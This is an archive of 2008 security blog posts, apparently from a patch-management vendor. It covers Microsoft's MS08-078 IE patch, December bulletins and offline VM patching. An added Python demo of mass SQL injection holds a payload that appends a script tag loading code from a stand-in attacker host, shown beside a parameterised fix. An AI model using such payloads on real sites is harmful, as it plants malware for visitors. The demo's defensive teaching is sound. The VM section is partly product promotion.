Archive for December, 2008

MS08-078 Emergency IE patch

Microsoft’s latest out-of-band IE patch needs to be installed right away. The number of infected websites is growing at an alarming rate – even people visiting legitimate websites are getting hacked with this exploit. Patch it now – just do it.

Why did this come out as an out-of-band release? It looks like Microsoft was informed of the IE zero-day at the same time as everyone else – namely, last Tuesday (Patch Tuesday). Based on Microsoft MSRC blog posts, starting on Tuesday Microsoft studied the exploit, reviewed source code, and determined that it impacted all versions of IE. From that point on, it can be assumed that Microsoft was working quickly on a patch for all versions of IE.

Microsoft had to determine how serious the issue was, as that guided whether to release an out-of-band patch or wait until the next monthly cycle. By late last week, Microsoft was aware that this issue was infecting users’ systems at a faster rate than they had seen with past zero-day exploits. Specifically, attackers were loading the exploit onto legitimate websites, so that even users who visit only non-nefarious websites might get infected. Based on that data, it’s my belief that Microsoft decided the issue warranted an out-of-band patch release.

Researching, fixing, testing, and releasing a security patch within an eight-day window is an incredible feat – especially given the need to support all versions of IE across all platforms and languages. This is an ‘all hands on deck’ response from Microsoft – I don’t think we’ll see this as the norm for less critical patches in the future, as it is quite disruptive to their own processes.

Now it’s equally important for customers to roll out this patch to all of their systems as soon as possible. I’d bet you a cookie that many companies can’t get it rolled out as quickly as Microsoft got it built.



Internet Explorer Zero Day Mass Hysteria

An article was posted online today at a tech publication that mentions the Internet Explorer zero-day vulnerability and includes suggestions from unnamed security experts to ‘switch to an alternative internet browser, such as Firefox or Google Chrome.’

This is all overblown.

Yes, an unpatched security vulnerability exists in Internet Explorer. Yes, it’s being actively exploited on the Internet, and Yes, even visiting legitimate websites can lead to compromise*.

No, this isn’t very different from previously announced zero-day exploits (except that we’re seeing a wider distribution of the exploit and more machines being hacked). No, the world isn’t coming to an end, and No, you don’t need to change your browser.

ZDNet security bloggers are claiming that Microsoft is on target to release an out-of-band security patch for this IE issue as early as tomorrow (December 17th). When it is released, install the patch. Until then, apply the workarounds posted by Microsoft to help protect yourself from this issue.

While you’re at it, install all the other security patches that may be missing on your system. To an attacker, one unpatched issue on your system is as good as a zero-day flaw being exploited on the Internet. Unless you’re fully patched, you’re not patched at all.

* Attackers are planting the exploit on non-nefarious websites via SQL injection. This means that visiting supposedly safe websites can lead to compromise via this IE flaw. These ‘legit’ websites have an even bigger problem: attackers were able to exploit poor SQL coding practices on these sites, which let them inject malicious code into the pages the sites serve.
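The injection the footnote describes, as an added example that is not part of the original post: an in-memory SQLite database stands in for the site’s database (the 2008 attacks hit SQL Server, but the mechanism is the same), the posts and the attacker’s script URL are constructed, and the handler names are hypothetical. The vulnerable ‘edit my post’ handler concatenates request fields into an UPDATE, so a single request appends a script tag to every post on the site; the parameterised version confines the edit to the caller’s own post.

```python
"""Mass SQL injection of a <script> tag into every page of a site.

Added example, not code from the original post. Uses an in-memory SQLite
database with a constructed 'posts' table. The vulnerable handler builds
its UPDATE by string concatenation; the safe one uses a typed id and
bound parameters.
"""
import sqlite3

# Hypothetical attacker-hosted script; the URL is made up for the example.
EVIL_SRC = "http://evil.example/x.js"


def make_db():
    """Build a small site database with posts by several authors (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, author TEXT, body TEXT)")
    db.executemany(
        "INSERT INTO posts (id, author, body) VALUES (?, ?, ?)",
        [(1, "alice", "Welcome to our site"),
         (2, "bob", "Quarterly results are up"),
         (3, "mallory", "Hello")],
    )
    db.commit()
    return db


def vulnerable_edit_post(db, user, post_id, body):
    """Edit handler that concatenates request fields into SQL (the flaw).

    'user' comes from the session; 'post_id' and 'body' are request fields.
    Returns the number of rows changed.
    """
    sql = ("UPDATE posts SET body = '" + body + "' WHERE id = " + post_id
           + " AND author = '" + user + "'")
    cur = db.execute(sql)
    db.commit()
    return cur.rowcount


def safe_edit_post(db, user, post_id, body):
    """Same handler with a typed id and bound parameters; data never becomes SQL."""
    try:
        post_id = int(post_id)
    except ValueError:
        return 0  # reject anything that is not a plain integer id
    cur = db.execute(
        "UPDATE posts SET body = ? WHERE id = ? AND author = ?",
        (body, post_id, user),
    )
    db.commit()
    return cur.rowcount


def infected_rows(db):
    """Ids of posts whose body now carries the injected script tag."""
    rows = db.execute("SELECT id FROM posts WHERE body LIKE '%<script%' ORDER BY id")
    return [r[0] for r in rows]


# Attacker payload. The body closes the string literal and appends the tag to
# the existing body; the id makes the WHERE clause true for every row and the
# trailing '--' comments out the author check.
ATTACK_BODY = "' || body || '<script src=\"" + EVIL_SRC + "\"></script>"
ATTACK_ID = "0 OR 1=1 --"


def run_demo():
    """Run the payload against both handlers; returns (vulnerable_hits, safe_hits)."""
    db = make_db()
    vulnerable_edit_post(db, "mallory", ATTACK_ID, ATTACK_BODY)
    vuln_hits = infected_rows(db)  # every post now serves the script

    db = make_db()
    safe_edit_post(db, "mallory", ATTACK_ID, ATTACK_BODY)
    safe_hits = infected_rows(db)  # nothing changed
    return vuln_hits, safe_hits


if __name__ == "__main__":
    print(run_demo())
```

The resulting statement in the vulnerable case is `UPDATE posts SET body = '' || body || '<script src="…"></script>' WHERE id = 0 OR 1=1 -- AND author = 'mallory'`, which is exactly the ‘append a script tag to every text column’ pattern seen in the 2008 mass injections. With bound parameters the same input is just text: the id fails integer validation, and even a legitimate integer id still only reaches rows whose author matches the session user.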


December 2008 patch day

Microsoft has released 8 security bulletins today, 6 of which are rated Critical. However, it’s the non-Critical patches that are more interesting this month – we’ll get to those in a minute.

The first 5 bulletins are all ‘client-side’ vulnerabilities. This means a user’s computer can be exploited if they visit an evil website or open a malicious document. Components vulnerable to this evil content include ActiveX controls (part of your browser), graphics image handling (for images hosted on websites or embedded in documents), Word, Outlook, Excel, and Internet Explorer. In most cases, the new patches replace older security patches released earlier in 2008.

The 6th bulletin (MS08-075) is specific to Windows Vista and Windows Server 2008, and is a variant of an attack that was discussed and patched in July 2008. In this case, saving and opening an evil Windows Search file can lead to your system being compromised. Not many people typically do this, so I consider it low risk. Why Microsoft didn’t catch this variant back in July, I’ll never know.

The 7th bulletin released this month (MS08-076) is very interesting and is closely related to a security patch from last month – MS08-068. This new flaw enables attackers to obtain your computer’s credentials and use them to access your system remotely without your knowledge. This can happen if you click on an evil URL pointing at Windows Media content (typically audio and/or video clips). In this scenario, when a user clicks the evil link, their password, or rather the NTLM challenge-response derived from it, is sent to an evil server, where the attacker can replay those credentials to log back on to the user’s computer. It’s similar to the MS08-068 attack (credential replay), but uses a different communication mechanism to log on to the computer. Microsoft says that the Windows Media components handle authentication separately from the operating system, which is why this case wasn’t fixed in the November release. This issue could become very serious if attackers figure out how to craft the evil URLs. I’d get this one patched right away (even though Microsoft only rates it as Important).

The last bulletin for this month (MS08-077) relates to Office SharePoint Server 2007 and Search Server 2008. A flaw in the access controls of these applications might allow users to reach parts of the SharePoint or Search servers and execute some administrative tasks. These tasks, while not giving users direct access to protected information, could cause the server to stop responding to legitimate requests, or could give attackers additional information, such as the email addresses of users on the system.

I’d recommend patching MS08-076, as well as MS08-070 through MS08-075, as soon as possible. Corporations and hosting services that use SharePoint 2007 should install MS08-077 as soon as they can.


Microsoft offline virtual patching not really ‘offline’

Microsoft has released an updated version of what they call their ‘offline virtual machine servicing tool’. This tool is intended to aid administrators in patching Microsoft Virtual Machines that are currently offline (turned off).

Microsoft makes a good case for the need to patch offline VM images – something that Shavlik has been saying for quite a while: “Offline machines do not automatically receive operating system, antivirus, or application updates that would keep them compliant with current IT policy. An out-of-date virtual machine may pose a risk to the IT environment. If deployed and started, the out-of-date virtual machine might be vulnerable to attack or could be capable of attacking other network resources. Therefore, IT groups must take measures to ensure that offline virtual machines remain up-to-date and compliant.”

Microsoft states that their solution can patch the offline images. If you look deeper at their solution, however, you find that this isn’t really the case. As Microsoft continues: “At present, these measures involve temporarily bringing the virtual machine online, applying the necessary updates, and then storing it again.”

Wow. This isn’t offline patching; this is online patching. The Microsoft solution moves the offline image to another server, launches the image (turns it on), has the image check in with a WSUS or SCCM server, and performs an online patch assessment followed by an online patch download and deployment. When done, it turns the image off and moves it back to the original image repository.

How is this offline patching? Rather than leveraging efficiencies gained from evaluating the offline image, the Microsoft solution requires the administrator to launch each of the VM images, scan them, patch them, and turn them off. This requires CPU and memory for each VM, additional servers, storage, and networks to move and launch the VM in a private network, and more time to launch the VM before it can even be assessed.

According to Microsoft’s documentation, their solution “brings groups of virtual machines online just long enough for them to receive updates from either System Center Configuration Manager 2007 or Windows Server Update Services. As soon as the virtual machines are up-to-date, the tool returns them to the offline state in the Virtual Machine Manager library.”

By contrast, the Shavlik solution doesn’t require the VM images to be turned on in order to perform a patch assessment. The Shavlik engine scans the offline image while it is turned off – a true offline solution. Shavlik’s scan function doesn’t require the image to be moved to another system or network, and doesn’t require the image to be turned on. This approach saves both time and hardware and allows a much larger number of images to be scanned in less time. Additionally, the Shavlik solution can scan and patch many more applications (both Microsoft and third party) than Microsoft’s WSUS- and SCCM-based solution.

As an IT administrator, I’d prefer to understand the patch status before I turn on the image. I’d also like to prep all the patches for installation on the image before turning it on. Then, when I do turn on the image, the patches can install right away. By copying the patches to the system when it’s offline, we’ve eliminated the time needed to download the patches to each image after it’s turned on.
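The assessment and pre-staging described above, as an added example that is not Shavlik’s or Microsoft’s code: it assumes the image has already been mounted read-only and that file versions have been read out of it, so both that inventory and the bulletin catalogue are constructed, with illustrative version numbers and hypothetical package names. It shows the comparison an offline scanner has to get right (4-part Windows versions compared numerically, never as strings), how a bulletin is judged missing, installed, or not applicable when its component isn’t in the image, and which packages to copy into the image before it is booted.

```python
"""Assess an offline VM image for missing patches and stage the packages.

Added example, not Shavlik's or Microsoft's code. It assumes the image is
already mounted read-only and that an inventory of file versions has been
read from it; here the inventory and the bulletin catalogue are constructed
data with illustrative versions and hypothetical package names.
"""
from dataclasses import dataclass


def parse_version(text):
    """Turn a Windows 4-part version string into a tuple of ints.

    Plain string comparison gets this wrong: '6.0.2900.5512' > '6.0.2900.10000'
    as text, but build 10000 is the newer one.
    """
    parts = text.split(".")
    if len(parts) != 4 or not all(p.isdigit() for p in parts):
        raise ValueError("not a 4-part version: %r" % text)
    return tuple(int(p) for p in parts)


@dataclass(frozen=True)
class Bulletin:
    """Hypothetical bulletin record: the files it fixes and the package to stage."""
    name: str
    min_versions: dict   # file path relative to the image root -> fixed version
    package: str         # installer to copy into the image (name is made up)


def assess(inventory, catalogue):
    """Return {bulletin name: status} for an offline image's file inventory.

    'inventory' maps file paths to version strings read from the image.
    A bulletin is 'missing' if any file it covers is older than the fixed
    version, 'installed' if every covered file is at or above it, and
    'not applicable' if none of its files exist (component not installed).
    """
    result = {}
    for b in catalogue:
        present = {p: v for p, v in b.min_versions.items() if p in inventory}
        if not present:
            result[b.name] = "not applicable"
            continue
        older = [p for p, fixed in present.items()
                 if parse_version(inventory[p]) < parse_version(fixed)]
        result[b.name] = "missing" if older else "installed"
    return result


def stage_packages(status, catalogue):
    """Packages to copy into the offline image before it boots, in catalogue order."""
    want = {name for name, st in status.items() if st == "missing"}
    return [b.package for b in catalogue if b.name in want]


# Constructed inventory, as if read from a mounted 2008-era XP guest image.
# File names are real system files; the version numbers are illustrative only.
IMAGE_INVENTORY = {
    "Windows/System32/mshtml.dll": "6.0.2900.5512",
    "Windows/System32/gdiplus.dll": "5.1.3102.2180",
    "Windows/System32/wmp.dll": "10.0.0.3802",
}

# Constructed catalogue: bulletin names are real, the file/version pairs and
# package names are made up for the example.
CATALOGUE = [
    Bulletin("MS08-078", {"Windows/System32/mshtml.dll": "6.0.2900.5694"}, "ms08-078-pkg.exe"),
    Bulletin("MS08-071", {"Windows/System32/gdiplus.dll": "5.1.3102.2180"}, "ms08-071-pkg.exe"),
    Bulletin("MS08-076", {"Windows/System32/wmp.dll": "10.0.0.4000"}, "ms08-076-pkg.exe"),
    Bulletin("MS08-075", {"Windows/System32/SearchProtocolHost.exe": "7.0.6001.18000"}, "ms08-075-pkg.msu"),
]


def run_demo():
    """Assess the constructed image; returns (status dict, packages to stage)."""
    status = assess(IMAGE_INVENTORY, CATALOGUE)
    return status, stage_packages(status, CATALOGUE)


if __name__ == "__main__":
    for name, st in run_demo()[0].items():
        print(name, st)
    print("stage:", run_demo()[1])
```

Everything here runs against the powered-off image: the scanner reads versions, decides what is missing, and the staged packages can be copied into the image so that the first boot installs them immediately instead of first downloading them. The ‘not applicable’ branch matters in practice; a Vista-only bulletin such as MS08-075 must not be reported as missing on an XP image just because the file isn’t there.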

To protect unpatched systems from being hacked when turned on (and before patch installation) the administrator can launch the VM images in a ‘network disconnected’ state. Once the patches have been installed and the system rebooted, it can be joined back to the network. (Microsoft accomplishes this protection by launching the VM image on a private internal network.) Future versions of Shavlik’s solution will automate the ‘network disconnection’ process when launching the VM image in order to install the patches.

Shavlik’s solution is unique in the marketplace. I’m not aware of any other solution (aside from VMware’s solution which leverages Shavlik’s scan engine) that can truly perform patch assessment and prep deployment against offline VM images.
